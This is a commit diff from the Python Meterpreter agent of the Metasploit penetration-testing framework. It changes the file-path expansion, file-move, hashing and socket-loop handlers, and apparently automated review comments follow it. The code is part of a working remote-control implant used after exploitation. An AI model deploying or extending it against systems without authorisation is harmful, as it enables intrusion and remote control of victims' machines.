Land #2349 pymeterp fixes

bug/bundler_fix sprint-C02
James Lee 2013-09-10 16:42:58 -05:00
commit 6ba9693d5d
No known key found for this signature in database
GPG Key ID: 2D6094C7CEA0A321
2 changed files with 26 additions and 13 deletions


@ -580,20 +580,28 @@ def stdapi_fs_delete_file(request, response):
@meterpreter.register_function @meterpreter.register_function
def stdapi_fs_file_expand_path(request, response): def stdapi_fs_file_expand_path(request, response):
path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
if path_tlv == '%COMSPEC%': if has_windll:
if platform.system() == 'Windows': path_out = (ctypes.c_char * 4096)()
result = 'cmd.exe' path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out))
else: result = ''.join(path_out)[:path_out_len]
elif path_tlv == '%COMSPEC%':
result = '/bin/sh' result = '/bin/sh'
elif path_tlv in ['%TEMP%', '%TMP%'] and platform.system() != 'Windows': elif path_tlv in ['%TEMP%', '%TMP%']:
result = '/tmp' result = '/tmp'
else: else:
result = os.getenv(path_tlv) result = os.getenv(path_tlv, path_tlv)
if not result: if not result:
return ERROR_FAILURE, response return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_FILE_PATH, result) response += tlv_pack(TLV_TYPE_FILE_PATH, result)
return ERROR_SUCCESS, response return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_file_move(request, response):
oldname = packet_get_tlv(request, TLV_TYPE_FILE_NAME)['value']
newname = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
os.rename(oldname, newname)
return ERROR_SUCCESS, response
@meterpreter.register_function @meterpreter.register_function
def stdapi_fs_getwd(request, response): def stdapi_fs_getwd(request, response):
response += tlv_pack(TLV_TYPE_DIRECTORY_PATH, os.getcwd()) response += tlv_pack(TLV_TYPE_DIRECTORY_PATH, os.getcwd())
@ -622,7 +630,7 @@ def stdapi_fs_md5(request, response):
m = hashlib.md5() m = hashlib.md5()
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
m.update(open(path, 'rb').read()) m.update(open(path, 'rb').read())
response += tlv_pack(TLV_TYPE_FILE_NAME, m.hexdigest()) response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
return ERROR_SUCCESS, response return ERROR_SUCCESS, response
@meterpreter.register_function @meterpreter.register_function
@ -669,7 +677,7 @@ def stdapi_fs_sha1(request, response):
m = hashlib.sha1() m = hashlib.sha1()
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
m.update(open(path, 'rb').read()) m.update(open(path, 'rb').read())
response += tlv_pack(TLV_TYPE_FILE_NAME, m.hexdigest()) response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
return ERROR_SUCCESS, response return ERROR_SUCCESS, response
@meterpreter.register_function @meterpreter.register_function
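Review bot: In the new `has_windll` branch of `stdapi_fs_file_expand_path`, the value returned by `ExpandEnvironmentStringsA` is used directly as a slice length. On success that count includes the terminating NUL, so `''.join(path_out)[:path_out_len]` appears to leave a trailing `\x00` in `result`. When the expansion does not fit in the 4096-byte buffer, the call returns the required size instead, and the slice then hands back the whole buffer as if it were a valid path. I would check the length and read the C string directly, e.g. `if 0 < path_out_len <= ctypes.sizeof(path_out): result = path_out.value`, with `result = ''` otherwise so that the existing `if not result` check reports the failure.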


@ -145,8 +145,9 @@ class STDProcessBuffer(threading.Thread):
self.data_lock.acquire() self.data_lock.acquire()
self.data += byte self.data += byte
self.data_lock.release() self.data_lock.release()
data = self.std.read()
self.data_lock.acquire() self.data_lock.acquire()
self.data += self.std.read() self.data += data
self.data_lock.release() self.data_lock.release()
def is_read_ready(self): def is_read_ready(self):
@ -208,7 +209,7 @@ class PythonMeterpreter(object):
def run(self): def run(self):
while self.running: while self.running:
if len(select.select([self.socket], [], [], 0)[0]): if len(select.select([self.socket], [], [], 0.5)[0]):
request = self.socket.recv(8) request = self.socket.recv(8)
if len(request) != 8: if len(request) != 8:
break break
@ -391,13 +392,17 @@ class PythonMeterpreter(object):
reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID) reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
resp += tlv_pack(reqid_tlv) resp += tlv_pack(reqid_tlv)
if method_tlv['value'] in self.extension_functions: handler_name = method_tlv['value']
handler = self.extension_functions[method_tlv['value']] if handler_name in self.extension_functions:
handler = self.extension_functions[handler_name]
try: try:
#print("[*] running method {0}".format(handler_name))
result, resp = handler(request, resp) result, resp = handler(request, resp)
except Exception, err: except Exception, err:
#print("[-] method {0} resulted in an error".format(handler_name))
result = ERROR_FAILURE result = ERROR_FAILURE
else: else:
#print("[-] method {0} was requested but does not exist".format(handler_name))
result = ERROR_FAILURE result = ERROR_FAILURE
resp += tlv_pack(TLV_TYPE_RESULT, result) resp += tlv_pack(TLV_TYPE_RESULT, result)
resp = struct.pack('>I', len(resp) + 4) + resp resp = struct.pack('>I', len(resp) + 4) + resp
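Review bot: The three `#print(...)` lines added around the handler dispatch are commented-out code, so a handler that raises still leaves no trace: `except Exception, err:` binds `err` and then discards it. Either remove them, or make the diagnostics switchable and include the exception, for example `if DEBUG: print("[-] method {0} failed: {1}".format(handler_name, err))`, where `DEBUG` is a placeholder name for a module-level flag that defaults to off. A short comment on the `except` explaining that every handler error is deliberately collapsed into `ERROR_FAILURE` would also help the next reader. The enclosing method starts outside this hunk, so this is based only on the lines shown.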